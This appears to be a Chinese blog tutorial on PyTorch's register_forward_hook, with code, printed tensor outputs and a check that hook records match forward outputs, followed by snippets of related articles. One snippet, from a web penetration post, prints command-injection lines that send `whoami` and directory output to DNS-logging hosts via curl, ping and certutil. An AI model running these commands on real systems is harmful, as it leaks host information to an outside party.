pytorch中的hook机制register_forward_hook
上篇文章主要介绍了hook钩子函数的大致使用流程,本篇文章主要介绍pytorch中的hook机制register_forward_hook,手动在forward之前注册hook,hook在forward执行以后被自动执行。
1、hook背景
Hook被成为钩子机制,pytorch中包含forward和backward两个钩子注册函数,用于获取forward和backward中输入和输出,按照自己不全面的理解,应该目的是“不改变网络的定义代码,也不需要在forward函数中return某个感兴趣层的输出,这样代码太冗杂了”。
2、源码阅读
register_forward_hook()函数必须在forward()函数调用之前被使用,因为该函数源码注释显示这个函数“ it will not have effect on forward since this is called after :func:forward is called”,也就是这个函数在forward()之后就没有作用了!):
作用:获取forward过程中每层的输入和输出,用于对比hook是不是正确记录。
def register_forward_hook(self, hook):r"""Registers a forward hook on the module.The hook will be called every time after :func:`forward` has computed an output.It should have the following signature::hook(module, input, output) -> None or modified outputThe hook can modify the output. It can modify the input inplace butit will not have effect on forward since this is called after:func:`forward` is called.Returns::class:`torch.utils.hooks.RemovableHandle`:a handle that can be used to remove the added hook by calling``handle.remove()``"""handle = hooks.RemovableHandle(self._forward_hooks)self._forward_hooks[handle.id] = hookreturn handle
3、定义一个用于测试hook的类
如果随机的初始化每个层,那么就无法测试出自己获取的输入输出是不是forward中的输入输出了,所以需要将每一层的权重和偏置设置为可识别的值(比如全部初始化为1)。网络包含两层(Linear有需要求导的参数被称为一个层,而ReLU没有需要求导的参数不被称作一层),init()中调用initialize函数对所有层进行初始化。
**注意:**在forward()函数返回各个层的输出,但是ReLU6没有返回,因为后续测试的时候不对这一层进行注册hook。
class TestForHook(nn.Module):def __init__(self):super().__init__()self.linear_1 = nn.Linear(in_features=2, out_features=2)self.linear_2 = nn.Linear(in_features=2, out_features=1)self.relu = nn.ReLU()self.relu6 = nn.ReLU6()self.initialize()def forward(self, x):linear_1 = self.linear_1(x)linear_2 = self.linear_2(linear_1)relu = self.relu(linear_2)relu_6 = self.relu6(relu)layers_in = (x, linear_1, linear_2)layers_out = (linear_1, linear_2, relu)return relu_6, layers_in, layers_outdef initialize(self):""" 定义特殊的初始化,用于验证是不是获取了权重"""self.linear_1.weight = torch.nn.Parameter(torch.FloatTensor([[1, 1], [1, 1]]))self.linear_1.bias = torch.nn.Parameter(torch.FloatTensor([1, 1]))self.linear_2.weight = torch.nn.Parameter(torch.FloatTensor([[1, 1]]))self.linear_2.bias = torch.nn.Parameter(torch.FloatTensor([1]))return True
4、定义hook函数
hook()函数是register_forward_hook()函数必须提供的参数,首先定义几个容器用于记录:
定义用于获取网络各层输入输出tensor的容器:
# 同时定义module_name用于记录相应的module名字
module_name = []
features_in_hook = []
features_out_hook = []
hook函数需要三个参数,这三个参数是系统传给hook函数的,自己不能修改这三个参数:
hook函数负责将获取的输入输出添加到feature列表中;并提供相应的module名字。
def hook(module, fea_in, fea_out):print("hooker working")module_name.append(module.__class__)features_in_hook.append(fea_in)features_out_hook.append(fea_out)return None
5、对需要的层注册hook
注册钩子必须在forward()函数被执行之前,也就是定义网络进行计算之前就要注册,下面的代码对网络除去ReLU6以外的层都进行了注册(也可以选定某些层进行注册):
注册钩子可以对某些层单独进行:
net = TestForHook()
net_chilren = net.children()
for child in net_chilren:if not isinstance(child, nn.ReLU6):child.register_forward_hook(hook=hook)
6、测试forward()返回的特征和hook记录的是否一致
6.1 测试forward()提供的输入输出特征
由于前面的forward()函数返回了需要记录的特征,这里可以直接测试:
out, features_in_forward, features_out_forward = net(x)
print("*"*5+"forward return features"+"*"*5)
print(features_in_forward)
print(features_out_forward)
print("*"*5+"forward return features"+"*"*5)
输出如下:
*****forward return features*****
(tensor([[0.1000, 0.1000],[0.1000, 0.1000]]), tensor([[1.2000, 1.2000],[1.2000, 1.2000]], grad_fn=<AddmmBackward>), tensor([[3.4000],[3.4000]], grad_fn=<AddmmBackward>))
(tensor([[1.2000, 1.2000],[1.2000, 1.2000]], grad_fn=<AddmmBackward>), tensor([[3.4000],[3.4000]], grad_fn=<AddmmBackward>), tensor([[3.4000],[3.4000]], grad_fn=<ThresholdBackward0>))
*****forward return features*****
6.2 hook记录的输入特征和输出特征
hook通过list结构进行记录,所以可以直接print。
测试features_in是否存储了输入:
print("*"*5+"hook record features"+"*"*5)
print(features_in_hook)
print(features_out_hook)
print(module_name)
print("*"*5+"hook record features"+"*"*5)
得到和forward一样的结果:
*****hook record features*****
[(tensor([[0.1000, 0.1000],[0.1000, 0.1000]]),), (tensor([[1.2000, 1.2000],[1.2000, 1.2000]], grad_fn=<AddmmBackward>),), (tensor([[3.4000],[3.4000]], grad_fn=<AddmmBackward>),)]
[tensor([[1.2000, 1.2000],[1.2000, 1.2000]], grad_fn=<AddmmBackward>), tensor([[3.4000],[3.4000]], grad_fn=<AddmmBackward>), tensor([[3.4000],[3.4000]], grad_fn=<ThresholdBackward0>)]
[<class 'torch.nn.modules.linear.Linear'>,
<class 'torch.nn.modules.linear.Linear'>,<class 'torch.nn.modules.activation.ReLU'>]
*****hook record features*****
6.3 把hook记录的和forward做减法
如果害怕会有小数点后面的数值不一致,或者数据类型的不匹配,可以对hook记录的特征和forward记录的特征做减法:
测试forward返回的feautes_in是不是和hook记录的一致:
print("sub result'")
for forward_return, hook_record in zip(features_in_forward, features_in_hook):print(forward_return-hook_record[0])
得到的全部都是0,说明hook没问题:
sub result
tensor([[0., 0.],[0., 0.]])
tensor([[0., 0.],[0., 0.]], grad_fn=<SubBackward0>)
tensor([[0.],[0.]], grad_fn=<SubBackward0>)
7、完整代码
import torch
import torch.nn as nnclass TestForHook(nn.Module):def __init__(self):super().__init__()self.linear_1 = nn.Linear(in_features=2, out_features=2)self.linear_2 = nn.Linear(in_features=2, out_features=1)self.relu = nn.ReLU()self.relu6 = nn.ReLU6()self.initialize()def forward(self, x):linear_1 = self.linear_1(x)linear_2 = self.linear_2(linear_1)relu = self.relu(linear_2)relu_6 = self.relu6(relu)layers_in = (x, linear_1, linear_2)layers_out = (linear_1, linear_2, relu)return relu_6, layers_in, layers_outdef initialize(self):""" 定义特殊的初始化,用于验证是不是获取了权重"""self.linear_1.weight = torch.nn.Parameter(torch.FloatTensor([[1, 1], [1, 1]]))self.linear_1.bias = torch.nn.Parameter(torch.FloatTensor([1, 1]))self.linear_2.weight = torch.nn.Parameter(torch.FloatTensor([[1, 1]]))self.linear_2.bias = torch.nn.Parameter(torch.FloatTensor([1]))return True# 定义用于获取网络各层输入输出tensor的容器,并定义module_name用于记录相应的module名字
module_name = []
features_in_hook = []
features_out_hook = []# hook函数负责将获取的输入输出添加到feature列表中,并提供相应的module名字
def hook(module, fea_in, fea_out):print("hooker working")module_name.append(module.__class__)features_in_hook.append(fea_in)features_out_hook.append(fea_out)return None# 定义全部是1的输入:
x = torch.FloatTensor([[0.1, 0.1], [0.1, 0.1]])# 注册钩子可以对某些层单独进行:
net = TestForHook()
net_chilren = net.children()
for child in net_chilren:if not isinstance(child, nn.ReLU6):child.register_forward_hook(hook=hook)# 测试网络输出:
out, features_in_forward, features_out_forward = net(x)
print("*"*5+"forward return features"+"*"*5)
print(features_in_forward)
print(features_out_forward)
print("*"*5+"forward return features"+"*"*5)# 测试features_in是不是存储了输入:
print("*"*5+"hook record features"+"*"*5)
print(features_in_hook)
print(features_out_hook)
print(module_name)
print("*"*5+"hook record features"+"*"*5)# 测试forward返回的feautes_in是不是和hook记录的一致:
print("sub result")
for forward_return, hook_record in zip(features_in_forward, features_in_hook):print(forward_return-hook_record[0])相关文章:
pytorch中的hook机制register_forward_hook
上篇文章主要介绍了hook钩子函数的大致使用流程,本篇文章主要介绍pytorch中的hook机制register_forward_hook,手动在forward之前注册hook,hook在forward执行以后被自动执行。 1、hook背景 Hook被成为钩子机制,pytorch中包含forwa…...
使用Gin框架返回JSON、XML和HTML数据
简介 Gin是一个高性能的Go语言Web框架,它不仅提供了简洁的API,还支持快速的路由和中间件处理。在Web开发中,返回JSON、XML和HTML数据是非常常见的需求。本文将介绍如何使用Gin框架来返回这三种类型的数据。 环境准备 在开始之前࿰…...
网工内推 | 国企运维工程师,华为认证优先,最高年薪20w
01 上海陆家嘴物业管理有限公司 🔷招聘岗位:IT运维工程师 🔷岗位职责: 1、负责对公司软、硬件系统、周边设备、桌面系统、服务器、网络基础环境运行维护、故障排除。 2、负责对各部门软件操作、网络安全进行检查、指导。 3、负责…...
c# 使用异步函数实现线程的功能
c#程序执行时 想要拖动窗口 需要使用线程,但是使用线程 对操作前端窗体很不友好. 所以写了一个异步函数,网上搜了一下,貌似异步函数比线程 更加友好,更加现代 做这个功能的原因是 主要是想等程序执行完 走一个提示.用线程很难做到 using System; using System.Threading; usi…...
MySQL之MySQL server has gone away复现测试
测试MySQL server has gone away复现条件 环境情形一报错信息复现测试 情形二报错信息复现测试 环境 Python: 3.8/3.9 MySQL: 5.x 情形一 报错信息 File "/usr/local/lib/python3.6/dist-packages/MySQLdb/cursors.py", line 319, in _querydb.query(q)File "/…...
编程深水区之并发④:Web多线程
Node的灵感来源于Chrome,更是移植了V8引擎。在Node中能够实现的多线程,在Web环境中自然也可以。 一、浏览器是多进程和多线程的复杂应用 在本系列的第二章节,有提到现代浏览器是一个多进程和多线程的复杂应用。浏览器主进程统管全局…...
【实战指南】从提升AI知识库效果,从PDF转Markdown开始
经常有人抱怨AI知识库精确度不够、答非所问。我有时候想想,会觉得其实AI也挺冤的,因为很有可能不是它能力不行,而是你一开始给的文档就有问题,导致它提取文本有错误、不完整,那后边一连串的检索、生成怎么可能好呢&…...
Android 删除telephony的features
比如删除android.hardware.telephony.subscription 找到这个文件:frameworks/native/data/etc/android.hardware.telephony.subscription.xml <!-- This is the standard set of features for devices to support Telephony Subscription API. --> -<perm…...
Linux驱动开发—编写第一个最简单的驱动模块
文章目录 开发驱动准备工作1.正常运行的Linux系统的开发板2.内核源码树3.nfs挂载的rootfs4.得心趁手的IDE 第一个Hello world 驱动程序常见模块的操作命令模块的初始化和清理模块的版本信息模块中的各种宏 示例Hello World代码printk函数解析 使用MakeFile编译驱动模块使用insm…...
科普文:微服务之Spring Cloud 组件API网关Gateway
API网关是一个服务器,是系统的唯一入口。从面向对象设计的角度看,它与外观模式类似。API网关封装了系统内部架构,为每个客户端提供一个定制的API。它可能还具有其它职责,如身份验证、监控、负载均衡、缓存、请求分片与管理、静态响…...
Kubernetes中的CRI、CNI与CSI:深入理解云原生存储、网络与容器运行时
引言 随着云原生技术的飞速发展,Kubernetes(简称K8s)作为云原生应用的核心调度平台,其重要性日益凸显。K8s通过开放一系列接口,实现了高度的可扩展性和灵活性,其中CRI(Container Runtime Inter…...
【数据结构】二叉搜索树(Java + 链表实现)
Hi~!这里是奋斗的明志,很荣幸您能阅读我的文章,诚请评论指点,欢迎欢迎 ~~ 🌱🌱个人主页:奋斗的明志 🌱🌱所属专栏:数据结构、LeetCode专栏 📚本系…...
java Brotli压缩算法实现压缩、解压缩
在Java中实现Brotli压缩和解压缩,你可以使用org.brotlienc和org.brotlidec包中的类。以下是压缩和解压缩的基本步骤和示例代码: 压缩文件 创建FileInputStream以读取原始文件。创建BrotliOutputStream以写入压缩数据。读取原始文件并写入压缩流。关闭流…...
centos7.9 安装java相关组件
10.23.15.71 - 78 账户 admin IMES1 改为root再操作 $ sudo su root ($ su root) 下载包 /home/admin/download $ mkdir download $ chown -R admin:admin /home/admin/download 安装包 /data/local $ tar -sxvf jdk-11.0.23_linux-x64_bin.tar.gz -C /data/local $ mv jdk…...
在IntelliJ IDEA中,快速找到控制类(Controller类)中所有的方法,可以通过以下几种方式实现:
在IntelliJ IDEA中,快速找到控制类(Controller类)中所有的方法,可以通过以下几种方式实现: 1. 使用快捷键 Alt 7 操作说明:在IDEA中,按下Alt 7可以快速打开“Structure”窗口(在…...
ChatGPT的强大之处:探究及与国内产品的对比
论文题目:ChatGPT的强大之处:探究及与国内产品的对比 摘要 ChatGPT作为一种广泛应用的人工智能语言模型,自发布以来迅速走红全球。本文旨在探讨ChatGPT是否真如其流行程度所示那般强大,并对比其与国内类似产品的优劣,深…...
MySql审计平台
安装方式: cookieY/Yearning: 🐳 A most popular sql audit platform for mysql (github.com) 对数据库的一系列后台操作 AI助手 - AI助手提供SQL优化建议,帮助用户优化SQL语句,以获得更好的性能。同时AI助手还提供文本到SQL的…...
深度学习6--深度神经网络
1.VGG网络 在图像分 类这个领域中,深度卷积网络一般由卷积模块和全连接模块组成。 (1)卷积模块包含卷积层、池化层、Dropout 层、激活函数等。普遍认为,卷积模块是对 图像特征的提取,并不是对图像进行分类。 (2)全连接模块跟在卷积模块之后&…...
有了Power BI还需要深入学习Excel图表制作吗?
Power BI和Excel都是微软公司的产品,但它们在数据分析和可视化方面有着不同的定位和功能。 Power BI是一个强大的商业分析工具,它提供了数据集成、数据建模、报告和仪表板的创建等功能。Power BI 特别适合处理大量数据,并且可以连接到多种数…...
WEB渗透Web突破篇-命令执行
命令执行 >curl http://0ox095.ceye.io/whoami >ping whoami.b182oj.ceye.io >ping %CD%.lfofz7.dnslog.cn & cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 &…...
C++初阶-list的底层
目录 1.std::list实现的所有代码 2.list的简单介绍 2.1实现list的类 2.2_list_iterator的实现 2.2.1_list_iterator实现的原因和好处 2.2.2_list_iterator实现 2.3_list_node的实现 2.3.1. 避免递归的模板依赖 2.3.2. 内存布局一致性 2.3.3. 类型安全的替代方案 2.3.…...
进程地址空间(比特课总结)
一、进程地址空间 1. 环境变量 1 )⽤户级环境变量与系统级环境变量 全局属性:环境变量具有全局属性,会被⼦进程继承。例如当bash启动⼦进程时,环 境变量会⾃动传递给⼦进程。 本地变量限制:本地变量只在当前进程(ba…...
2024年赣州旅游投资集团社会招聘笔试真
2024年赣州旅游投资集团社会招聘笔试真 题 ( 满 分 1 0 0 分 时 间 1 2 0 分 钟 ) 一、单选题(每题只有一个正确答案,答错、不答或多答均不得分) 1.纪要的特点不包括()。 A.概括重点 B.指导传达 C. 客观纪实 D.有言必录 【答案】: D 2.1864年,()预言了电磁波的存在,并指出…...
【项目实战】通过多模态+LangGraph实现PPT生成助手
PPT自动生成系统 基于LangGraph的PPT自动生成系统,可以将Markdown文档自动转换为PPT演示文稿。 功能特点 Markdown解析:自动解析Markdown文档结构PPT模板分析:分析PPT模板的布局和风格智能布局决策:匹配内容与合适的PPT布局自动…...
PL0语法,分析器实现!
简介 PL/0 是一种简单的编程语言,通常用于教学编译原理。它的语法结构清晰,功能包括常量定义、变量声明、过程(子程序)定义以及基本的控制结构(如条件语句和循环语句)。 PL/0 语法规范 PL/0 是一种教学用的小型编程语言,由 Niklaus Wirth 设计,用于展示编译原理的核…...
Java多线程实现之Thread类深度解析
Java多线程实现之Thread类深度解析 一、多线程基础概念1.1 什么是线程1.2 多线程的优势1.3 Java多线程模型 二、Thread类的基本结构与构造函数2.1 Thread类的继承关系2.2 构造函数 三、创建和启动线程3.1 继承Thread类创建线程3.2 实现Runnable接口创建线程 四、Thread类的核心…...
Python 包管理器 uv 介绍
Python 包管理器 uv 全面介绍 uv 是由 Astral(热门工具 Ruff 的开发者)推出的下一代高性能 Python 包管理器和构建工具,用 Rust 编写。它旨在解决传统工具(如 pip、virtualenv、pip-tools)的性能瓶颈,同时…...
人机融合智能 | “人智交互”跨学科新领域
本文系统地提出基于“以人为中心AI(HCAI)”理念的人-人工智能交互(人智交互)这一跨学科新领域及框架,定义人智交互领域的理念、基本理论和关键问题、方法、开发流程和参与团队等,阐述提出人智交互新领域的意义。然后,提出人智交互研究的三种新范式取向以及它们的意义。最后,总结…...
解析奥地利 XARION激光超声检测系统:无膜光学麦克风 + 无耦合剂的技术协同优势及多元应用
在工业制造领域,无损检测(NDT)的精度与效率直接影响产品质量与生产安全。奥地利 XARION开发的激光超声精密检测系统,以非接触式光学麦克风技术为核心,打破传统检测瓶颈,为半导体、航空航天、汽车制造等行业提供了高灵敏…...
Unity中的transform.up
2025年6月8日,周日下午 在Unity中,transform.up是Transform组件的一个属性,表示游戏对象在世界空间中的“上”方向(Y轴正方向),且会随对象旋转动态变化。以下是关键点解析: 基本定义 transfor…...
